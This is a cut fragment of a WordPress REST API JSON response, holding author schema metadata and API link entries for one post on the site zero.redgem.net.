redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34965"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34965\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}